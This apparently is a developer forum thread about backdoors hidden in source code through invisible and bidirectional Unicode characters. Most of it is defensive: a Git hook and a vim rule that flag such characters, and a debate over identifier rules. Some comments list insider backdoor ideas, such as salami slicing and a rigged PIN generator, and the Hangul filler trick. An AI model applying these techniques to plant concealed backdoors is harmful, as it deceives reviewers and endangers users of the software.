This whole story has been stupid. These ideas have been around for ages and are not novel to the security community. Yet we've seen headlines like "all programs ever are vulnerable to this new hack." The root cause is not unicode characters but instead untrusted text. It isn't like a malicious library would be unable to sneak backdoors in through ascii source anyway. Heck, we just had a big kerfuffle over this happening in the linux kernel this year.
Or worse! Go look at the dependencies for some large enterprise system built in java. How many raw jars do you think are being included in there? Has anybody looked at the bytecode of these jars?
The point is not that the vulnerability is a trait of JavaScript, but to demonstrate how different Unicode characters can be used to create a vulnerability, exemplified by a piece of JavaScript.
Yes, I understand that, but the title and content don't explicitly mention the "detail" that the same attack vector exists for other languages and data formats.
It isn't, any relatively dynamic language is going to have these or similar issues. Many moons ago I saw similar examples in bash, I'm sure they are possible in PHP, ..., ..., ...
In fact, even the stricter languages probably do too: the “accidentally run something malicious via care-free use of exec” issue exists in just about every language that has “exec” or similar - it is a data-trusting error in the programmer's logic, not an issue with the language itself. The dynamic nature of some of JS's syntax is just one way to pollute the data being fed to exec, among the other sources (user input, being too trusting of config in the DB or filesystem, and so forth).
Javascript is a very good option to use for examples though: most devs know it well enough and it is everywhere so the potential scale of the danger is obvious, even more so in light of people being far too trusting of dependencies pulled via NPM and the recent examples of malicious updates getting into common packages.
Maybe the title could be a bit less click-baity, though I'm not sure what would be used instead that wouldn't be overly wordy for a punchy article title.
>> That said, nothing on my buildchain actually throws an error or warning.
Use hooks for CI on pre-commit / merge and pull requests, e.g. like this Git hook which would catch bidirectional Trojan Source characters:
#!/usr/bin/env python3
import sys
import subprocess

# Bidirectional override/isolate control characters (LRE, RLE, LRO, RLO,
# LRI, RLI, FSI, PDF, PDI) used in Trojan Source attacks.
bidi_chars = '\u202A\u202B\u202D\u202E\u2066\u2067\u2068\u202C\u2069'

# Each stdin line is "<old-sha> <new-sha> <ref>", as a Git receive hook provides.
for line in sys.stdin:
    old, new, ref = line.split()
    diff = subprocess.run(['git', 'diff', old, new],
                          stdout=subprocess.PIPE,
                          stderr=subprocess.STDOUT,
                          text=True)
    if diff.returncode != 0:
        print(diff.stdout)
        sys.exit(f'git diff ended with rc={diff.returncode}, receive TERMINATED')
    if any(c in diff.stdout for c in bidi_chars):
        print(diff.stdout)
        sys.exit('Possible Trojan Source Attack, receive REFUSED')
I wish GitHub/GitLab would provide such features out of the box, following best practice, so people can stop pasting them from the web or reinventing their own version in every team...
My editor (vim) will warn me with a loud visual red block for any non ascii char outside a string literal. But I do not think that is enough. Compiler and interpreter must be more strict.
After seeing this thread I added the following to my vimrc:
highlight link NonASCII Error
autocmd Syntax * :syntax match NonASCII "[^\d0-\d127]"
Obviously haven't been using it long, and I'm not confident enough in my vim knowledge to vouch for its correctness, but it works in the limited amount of scenarios I tested so far.
It has `editor.renderControlCharacters`, but only recently started natively displaying a few dangerous, previously invisible ones (directional overrides) [1]; besides that, you had to use an extension that adds highlights for non-ASCII non-whitelisted [2] or predefined [3] characters.
This was originally done with the goal of trying to hide/encode one program within another using non-displayable characters (such as zero width spaces), I just never got around to it. But reading this article has kind of reignited that interest for me and I think I might take another crack at that soon.
Ah, the famous Hangul filler. That's actually a Unicode bug they have refused to fix for some years now. It's still listed as an identifier character. I fixed that in my interpreter, cperl.
The next bugs are actually all JavaScript bugs, as they accept Unicode identifiers but don't check against the Unicode security guidelines, ignoring any profile. Accepting bidi, mixed scripts, unnormalized identifiers. This is very common, 99% of all interpreters and compilers don't care about Unicode security at all. They are rather proud to accept everyone, and point fingers at colleagues who only accept ASCII english.
Identifiers need to be identifiable by a human. That's the whole point. And the system needs to block illegal identifiers.
Similar to filesystem drivers, which treat path names as identifiers, but the driver writers think they are beyond such human issues. For them there is only garbage in, garbage out. Their path names are certainly not identifiable. A directory can contain bidi names, or mixed Russian and Greek scripts that all look the same, or names that are simply not normalized. There can be multiple visually duplicate names, and you never know which is which. At least with domain names they came up with a punycode solution, but that was only the tip of the iceberg, and a rather awkward workaround.
I think the recommendation to disallow any non-ASCII character is throwing out the baby with the bathwater.
How about code that wants to display some emojis? It would be cumbersome to use hex unicode everywhere. And while localisations should typically happen in a separate language file, it's very common to want some text in code intended for a single audience.
Blocking all the confusables might be tricky, and an allow list would be endless. Perhaps some magic pre-processor comment that says "allow unicode in this file".
> I think the recommendation to disallow any non-ASCII character is throwing out the baby with the bathwater.
Not throwing out all non-ASCII characters from code-files. Just throwing them out as being invalid identifiers in your code (think variables, function-names, etc).
> How about code that wants to display some emojis?
Fine. You quote that emoji in a string, and it's golden.
If you try to make a variable with the name of an emoji, however, your code crashes.
That would close this particular attack (but not the BIDI one the article mentions). But there is probably already too much code out there with π=3.14 in it to be feasible to do this.
I really thought that using the Greek letter for pi (or theta, etc.) was something you do to show your programming language supports Unicode identifiers, but that nobody actually does in real life. I wonder how people input this: do they know the Alt+xyz combo, do they select-copy-paste, or is there another way to write these characters that I'm not aware of?
Just to be clear, I don't mean people who are actually using Greek language for input - it's pretty obvious how they would type that character :)
Do you really have to write emoji in the code string? Similarly with international language characters. The sane thing is to use either json config files or i18n libraries.
If you are writing something intended for a single audience using i18n libraries can be unnecessary overhead. And emoji can also be icons like ⌘ that can be useful to display in the UI.
Yes, the Unicode characters are a problem. But do the norms and tooling play a role here as well?
Explicitly casting types, like String parameters to integers, would make this much more explicit. The convenience of accessing parameters via destructuring, versus explicitly calling request.getParameter("\u3164"). Having a static array of permissible commands declared elsewhere.
There's something to be said for verbosity and explicitness. Where the tooling and norms shun it, these 'invisible' backdoors gain an advantage.
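A minimal sketch of that style in Python (the command name "mytool", the parameter names, and the allow-list are made up for illustration):

import subprocess

ALLOWED_COMMANDS = {"status", "version"}       # static allow-list declared up front

def handle(params):
    command = params.get("command", "")
    timeout = int(params.get("timeout", "5"))  # explicit cast: garbage fails loudly
    if command not in ALLOWED_COMMANDS:
        raise ValueError(f"command not allowed: {command!r}")
    # no shell, no string interpolation: only vetted values reach the subprocess
    result = subprocess.run(["mytool", command], capture_output=True,
                            text=True, timeout=timeout)
    return result.stdout

Looking parameters up one by one, instead of destructuring whatever arrived, means a key spelled with an invisible character simply never gets read.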
Some examples of historic attacks you could embed in algorithms:
“Salami slicing” is a kind of embezzlement where eg an insider programs the computer to credit small amounts to the last account (and then opens an account with a name beginning with Z).
In the 90s there was a massive hushed up scandal where the programmers developing the early Barclaycard made the pseudo random number generator for pin codes just issue three distinct pins. This meant that a stolen card could be easily used because they could guess any pin in three goes before the ATM swallowed the card.
This is hardly an exhaustive list. It’s just to get people’s cogs turning… :)
> In the 90s there was a massive hushed up scandal where the programmers developing the early Barclaycard made the pseudo random number generator for pin codes just issue three distinct pins. This meant that a stolen card could be easily used because they could guess any pin in three goes before the ATM swallowed the card.
Took some digging to find any working links these days. The three pin thing is on page two but it doesn’t name which bank; I may have misremembered and it might not have been Barclays. The whole article is a good starting point for digging into other vulnerabilities and exploits too https://www.theregister.com/2005/10/21/phantoms_and_rogues/
Compilers and interpreters need a new pass to detect these characters in code and treat them as hard errors. This doesn't stop their use in comments where presumably they are still ok.
Alternatively, there needs to be an uptake of the use of code linters and pretty printers.
Just being curious, I pasted the example into Geany and VSCode, and in both the invisible character was visible :) I can't remember setting any special character / whitespace visibility options, but I think it is good to have this kind of option always on.
It is. The way it was explained to me, all the APIs you use are in English so naming variables in your local language is futile at best and would just require constant context switching.
I remember many moons ago MooTools announced international API translations as an April Fools joke. It did make me wonder if there’s an interesting programming experiment to be done there… but I’m a native English speaker so I’m not best positioned to know!
Not my experience. Plenty of codebases have variables in local language in France Germany and Sweden (where I have experience).
I have actually encountered a lot of problems with English codebases in those countries, as they often try to translate regional concepts that are not directly translatable. This is particularly annoying when it comes to administrative stuff, where one English word can refer to different local concepts (e.g. geographical divisions of the territory) and the translations are always clumsy. I have even seen nasty bugs come from there, where a "county" had different meanings in different places in the code because different teams had different ideas of what a county was but didn't discuss it.
While this is an interesting hack, the larger issue in the example is allowing any query parameter to write into a subprocess. exec() immediately throws flags for me, especially when it isn’t necessary like in the case of making an http call. Even when it isn’t passing arbitrary inputs from the web to the command line, it’s susceptible to DoS that could crash the whole kernel instead of just the web server. I get that this is just a contrived example to show the risk of hidden characters, but please don’t use process.exec() unless you have no other options.